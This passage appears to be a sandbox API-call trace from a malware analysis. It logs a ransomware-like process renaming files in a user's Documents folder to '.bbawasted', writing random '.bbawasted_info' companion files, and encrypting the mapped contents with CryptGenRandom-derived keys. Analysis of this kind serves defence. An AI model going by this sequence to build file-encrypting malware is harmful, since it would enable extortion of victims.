Flags=0x0, Size=0x288) returned 0x5c77b0 [0071.633] lstrcpyW (in: lpString1=0x5c782e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0071.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0071.633] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0071.634] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0071.634] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.634] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DFfRMeYWJQ7e-5.docx.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dffrmeywjq7e-5.docx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0071.635] WriteFile (in: hFile=0x120, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0071.636] SetEndOfFile (hFile=0x120) returned 1 [0071.636] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.636] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0071.636] lstrcpyW (in: lpString1=0x5c782e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0071.636] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DFfRMeYWJQ7e-5.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dffrmeywjq7e-5.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DFfRMeYWJQ7e-5.docx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dffrmeywjq7e-5.docx.bbawasted")) returned 1 [0071.637] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DFfRMeYWJQ7e-5.docx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dffrmeywjq7e-5.docx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0071.637] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0071.637] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x58e4 [0071.637] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x58e4) returned 0x570000 [0071.637] CloseHandle (hObject=0xfc) returned 1 [0071.639] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0071.640] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0071.640] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.640] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0071.641] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0071.641] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.649] SetEndOfFile (hFile=0x120) returned 1 [0071.651] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0071.651] CloseHandle (hObject=0x120) returned 1 [0071.652] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0071.652] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ce9a0 | out: hHeap=0x580000) returned 1 [0071.653] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0071.688] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0071.688] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.688] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dwLDuK9lHjcJ5bZeWh.xlsx") returned 67 [0071.688] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x290) returned 0x5c77b0 [0071.688] lstrcpyW (in: lpString1=0x5c7836, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0071.689] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0071.689] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0071.689] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0071.689] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.689] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dwLDuK9lHjcJ5bZeWh.xlsx.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dwlduk9lhjcj5bzewh.xlsx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0071.690] WriteFile (in: hFile=0x120, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0071.691] SetEndOfFile (hFile=0x120) returned 1 [0071.691] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.691] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0071.691] lstrcpyW (in: lpString1=0x5c7836, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0071.691] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dwLDuK9lHjcJ5bZeWh.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dwlduk9lhjcj5bzewh.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dwLDuK9lHjcJ5bZeWh.xlsx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dwlduk9lhjcj5bzewh.xlsx.bbawasted")) returned 1 [0071.692] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dwLDuK9lHjcJ5bZeWh.xlsx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dwlduk9lhjcj5bzewh.xlsx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.692] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0071.692] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x9811 [0071.692] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9811) returned 0x570000 [0071.692] CloseHandle (hObject=0x110) returned 1 [0071.695] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0071.696] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5d29d8 | out: pbBuffer=0x5d29d8) returned 1 [0071.696] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.696] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0071.697] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0071.697] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.705] SetEndOfFile (hFile=0x120) returned 1 [0071.707] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0071.707] CloseHandle (hObject=0x120) returned 1 [0071.709] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0071.709] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2c00 | out: hHeap=0x580000) returned 1 [0071.709] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0071.710] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0071.710] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.710] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HeIy8.rtf") returned 53 [0071.710] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x274) returned 0x5c77b0 [0071.710] lstrcpyW (in: lpString1=0x5c781a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0071.710] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0071.710] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0071.711] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0071.711] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.711] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HeIy8.rtf.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\heiy8.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0071.711] WriteFile (in: hFile=0x120, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0071.712] SetEndOfFile (hFile=0x120) returned 1 [0071.712] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.712] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0071.712] lstrcpyW (in: lpString1=0x5c781a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0071.712] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HeIy8.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\heiy8.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HeIy8.rtf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\heiy8.rtf.bbawasted")) returned 1 [0071.713] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HeIy8.rtf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\heiy8.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0071.713] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0071.713] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x137a4 [0071.713] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x137a4) returned 0xfe0000 [0071.713] CloseHandle (hObject=0xfc) returned 1 [0071.717] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0071.718] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5be908 | out: pbBuffer=0x5be908) returned 1 [0071.718] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.718] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0071.719] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0071.719] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.727] SetEndOfFile (hFile=0x120) returned 1 [0071.729] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0071.729] CloseHandle (hObject=0x120) returned 1 [0071.731] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0071.731] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2ce0 | out: hHeap=0x580000) returned 1 [0071.778] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0071.779] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0071.779] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.779] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iXSU quS.pptx") returned 57 [0071.779] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27c) returned 0x5c77b0 [0071.779] lstrcpyW (in: lpString1=0x5c7822, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0071.779] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0071.779] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0071.780] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0071.780] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.780] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iXSU quS.pptx.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ixsu qus.pptx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0071.781] WriteFile (in: hFile=0x120, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0071.782] SetEndOfFile (hFile=0x120) returned 1 [0071.782] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.782] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0071.782] lstrcpyW (in: lpString1=0x5c7822, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0071.782] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iXSU quS.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ixsu qus.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iXSU quS.pptx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ixsu qus.pptx.bbawasted")) returned 1 [0071.783] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iXSU quS.pptx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ixsu qus.pptx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.783] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0071.783] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0xfc09 [0071.783] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfc09) returned 0x570000 [0071.783] CloseHandle (hObject=0x110) returned 1 [0071.787] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0071.788] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5be908 | out: pbBuffer=0x5be908) returned 1 [0071.788] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.788] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0071.789] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0071.789] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.797] SetEndOfFile (hFile=0x120) returned 1 [0071.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0071.799] CloseHandle (hObject=0x120) returned 1 [0071.801] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0071.801] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0c18 | out: hHeap=0x580000) returned 1 [0071.801] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0071.802] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0071.802] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.802] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned 73 [0071.802] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x29c) returned 0x5c77b0 [0071.802] lstrcpyW (in: lpString1=0x5c7842, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0071.802] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0071.802] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0071.802] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0071.802] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0071.803] WriteFile (in: hFile=0x120, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0071.804] SetEndOfFile (hFile=0x120) returned 1 [0071.804] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.804] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0071.804] lstrcpyW (in: lpString1=0x5c7842, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0071.804] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.bbawasted")) returned 1 [0071.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0071.844] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0071.844] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x74e6 [0071.844] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x74e6) returned 0x570000 [0071.844] CloseHandle (hObject=0xf8) returned 1 [0071.848] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0071.849] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0071.849] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.849] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0071.850] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0071.850] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.869] SetEndOfFile (hFile=0x120) returned 1 [0071.872] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0071.872] CloseHandle (hObject=0x120) returned 1 [0071.873] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0071.874] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c0198 | out: hHeap=0x580000) returned 1 [0071.874] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0071.874] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0071.874] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.874] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PUbWuWs.docx") returned 56 [0071.875] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27a) returned 0x5d0700 [0071.875] lstrcpyW (in: lpString1=0x5d0770, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0071.875] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0071.875] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0071.875] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0071.875] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.875] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PUbWuWs.docx.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pubwuws.docx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0071.982] WriteFile (in: hFile=0x120, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0071.983] SetEndOfFile (hFile=0x120) returned 1 [0071.983] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 